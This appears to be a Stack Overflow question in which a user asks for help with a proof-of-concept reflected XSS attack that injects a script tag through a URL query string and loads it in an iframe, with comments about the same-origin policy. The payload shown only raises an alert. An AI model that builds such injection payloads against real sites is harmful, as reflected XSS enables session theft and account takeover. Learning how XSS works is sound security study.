0

I'm trying to implement a simple XSS attack for a (non-malicious) proof of concept and am having some issues. The goal is to populate a form and submit it within an iframe.

function grab() {
    alert('yess');
};

function makeLink() { 
    return "http://mysite.com/?" + encodeURIComponent("<script" + ">" + grab.toString() +
    ";grab();</script" + ">"); 
    // returns "http://mysite.com/?%3Cscript%3Efunction%20grab()%20%7B%0A%20%20%20%20alert('yess')%3B%0A%7D%3Bgrab()%3B%3C%2Fscript%3E"
}

var iframe = document.createElement('iframe');
iframe.src = makeLink(xssdefense, target, attacker);
iframe.height = 600;
iframe.width = 800;
// not sure if I need this line, but un-commenting doesn't seem to change anything. 
// iframe.sandbox = "allow-scripts allow-same-origin allow-forms"
document.body.appendChild(iframe);

Ideally when this html file is opened, an iframe with the javascript injected will be sitting there. Upon console investigation, grab() is defined and callable in the main window, but not in the frame, which puzzles me.

Anyway, any help is appreciated. Thanks a bunch!

xavdid
  • 5,092
  • 3
  • 20
  • 32
  • that's because of CORS, or cross origin resource sharing, you can't access the main window from the iframe because of the same origin policy. – Ohgodwhy Oct 10 '13 at 05:45
  • maybe i'm reversing it in my head, but since the javascript is injected and run in the iframe, shouldn't the javascript the accessible within it? when I say I ran it from the chrome console, I mean that I shifted context into the frame, ignoring the top level window. – xavdid Oct 10 '13 at 05:49
  • you maybe made it there, but you're using `mysite.com` which isn't the same as the origin that opened the window, `yoursite.com` – Ohgodwhy Oct 10 '13 at 05:50
  • Assuming `mysite.com` didn't have any protections against XSS, wouldn't that be the point of the attack? To execute js from somewhere you shouldn't be able to? – xavdid Oct 10 '13 at 05:54

0 Answers0